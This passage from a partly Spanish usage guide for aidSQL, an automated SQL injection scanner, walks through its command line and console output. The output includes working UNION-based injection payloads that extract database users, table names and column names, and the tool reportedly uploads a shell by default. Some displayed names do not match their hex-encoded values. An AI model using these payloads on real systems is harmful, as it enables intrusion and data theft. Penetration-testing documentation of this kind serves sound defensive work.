Merge report from the exploitation and data mining in TXT and XML format.
Basic usage:
Perform an automated scan on a web application. The following instruction initiates an automated scan on the web application.
./aidSQL --url=[URL] --no-shell
Dónde:
- --url: Web application URL address.
- --no-shell: Disabled the option to upload a shell.
Note: By defect the tool is configured to perform the data mining and upload a shell upon discovering a vulnerable parameter, thus it is recommended to disable the shell option to minimize the impact it may have on the web application and/or application server.
The tool will begin with crawling through the web application in order to generate the site-map of the pages and parameters present.
Normalized URL: http://midominio.com.mx/miaplicacion/
Crawling ...
Fetching content from http://midominio.com.mx/miaplicacion/
200 OK
TOTAL URL's found: 55
Add file index.jsp ...
Page "index.jsp" matches required types php,asp,aspx,cfm,do,jsp,htm,html
Add URL " http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome"
Parsing previously crawled URL, looking for new parameters
Adding new parameter "do"
This information is used next on the detection of vulnerable parameters through the injection of predefined SQL injections (UNION queries) and the analysis of the web application responses.
Testing links ...
1. { http://midominio.com.mx/miaplicacion/index.jsp }
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp
Set method GET …
Load sqli => mysql5 ... OK
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=Welcome
sql injection plugin...
[1][ [message] | METHOD: unionQuery
[QUERY] | b54293624e8b649e5e948364b6e4a9cb UNION ALL SELECT CONCAT(0x3c61696473716c3e,1,0x3c2f61696473716c3e)/*
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=b54293624e8b649e5e948364b6e4a9cb+
UNION+ALL+SELECT+CONCAT%280x3c61696473716c3e%2C1%2C0x3c2f61696473716c3e%29%2F%2A
[WW] WARNING: GOT 403
[2][ message] | METHOD: unionQuery …
During the scan execution, when a vulnerable parameter is detected, the data mining will be called to extract the information from the database.
Site is vulnerable to sql injection!
Skipping calling plugin's get shell method
Fetching database user ...
[message] | METHOD: unionQuery
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,USER(),0x3c2f61696473716c3e),3,4,5; --
Normalized URL: http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CUSER%28%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5%3B+--+
FOUND DATABASE seguridad
[message] | METHOD: unionQuery
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(TABLE_NAME,0x7c,TABLE_TYPE,0x7c,ENGINE,0x7c,TABLE_COLLATION,0x7c,
IF(AUTO_INCREMENT,1,0)),0x3c2f61696473716c3e),3,4,5 FROM information_schema.tables WHERE table_schema=0x6f776173703130; --
Normalized URL:
http://midominio.com.mx/miaplicacion/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
TABLE_NAME%2C0x7c%2CTABLE_TYPE%2C0x7c%2CENGINE%2C0x7c%2C
TABLE_COLLATION%2C0x7c%2CIF%28AUTO_INCREMENT%2C1%2C0%29%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+FROM+information_schema.tables+WHERE+table_schema%3D0x6f776173703130%3B+--+
Fetching table "cuentas" columns ...
[message] | METHOD: unionQuery
[QUERY] | 51761685aa5034e0731b9c9978073af0' UNION ALL SELECT 1,CONCAT(0x3c61696473716c3e,GROUP_CONCAT
(COLUMN_NAME,0x7c,COLUMN_TYPE,0x7c,IF(COLUMN_KEY,COLUMN_KEY,0),0x7c,IF(EXTRA,EXTRA,0) SEPARATOR 0x25),0x3c2f61696473716c3e),3,4,5
FROM information_schema.columns WHERE table_schema=0x6f776173703130 AND table_name=0x6163636f756e7473; --
Normalized URL:
http://midominio.com.mx/miaplicacion
/index.jsp?message=51761685aa5034e0731b9c9978073af0%27+
UNION+ALL+SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e%29%2C3%2C4%2C5+
FROM+information_schema.columns+
WHERE+table_schema%3D0x6f776173703130+AND+table_name%3D0x6163636f756e7473%3B+--+&password=prueba&user-info-php-submit-button=View%2BAccount%2BDetails&page=user-info.php
When the scan is completed, the tool will display a summary report of the detected vulnerabilities and the scan duration.
VULNERABLE LINKS FOUND : 1
TOTAL TIME : 53 seconds
La herramienta de manera automática, guarda los resultados de la explotación y minado de datos dentro de la capeta interna:
- Folder /logs/\[application name\]
- Log file - index.php_console.log
- XML file - index.php_db_schemas.xml
index.php_console.log file example:
HOST midominio.com.mx
------------------------------------
PLUGIN NAME : UNION
PLUGIN AUTHOR : Juan Stange
REQUEST VARIABLES : message, do, info, page,…
VULNERABLE LINK : http://midominio.com.mx/miaplicacion
/index.jsp?message==0eb751e9f79eb91238fc1902844d30e6%27+UNION+ALL+
SELECT+1%2CCONCAT%280x3c61696473716c3e%2CGROUP_CONCAT%28
COLUMN_NAME%2C0x7c%2CCOLUMN_TYPE%2C0x7c%2CIF%28COLUMN_KEY%2CCOLUMN_KEY%2C0%29%2C0x7c%2CIF%28EXTRA%2CEXTRA%2C0%29+SEPARATOR+0x25%29%2C0x3c2f61696473716c3e
%29%2C3%2C4%2C5+FROM+information_schema.columns+WHERE+
table_schema%3D0x6f776173703130+AND+table_name%3D0x70656e5f746573745f746f6f6c73%3B+--+
------------------------------------------------
SCHEMA seguridad
------------------------------------------------
VERSION : 5.5.16
DATADIR :
TABLE cuentas
---------------------
type : BASE TABLE
engine : InnoDB
collation : latin1_swedish_ci
increment : 1
COLUMNS
---------------------
NAME : cid
type int(11)
key 0
extra 0
NAME : username
…
index.php_db_schemas.xml file example:
<schemas>
<database name="owasp10" version="5.5.16" datadir="">
<tables>
<table name="accounts" type="BASE TABLE" engine="InnoDB" collation="latin1_swedish_ci" increment="1">
<column name="cid"><type>int(11)</type><key>0</key><extra>0</extra></column>
<column name="username"><type>text</type><key>0</key><extra>0</extra></column>
…
Resources:
Link: http://code.google.com/p/aidsql/.
Author(s): jpfstange
LynxSec IT consulting and security.
Contact: lynxsec [at] gmail.com
IRC: irc.freenode.net #aidsql
Twitter: http://twitter.com/#!aidsql
License: GNU GPL v2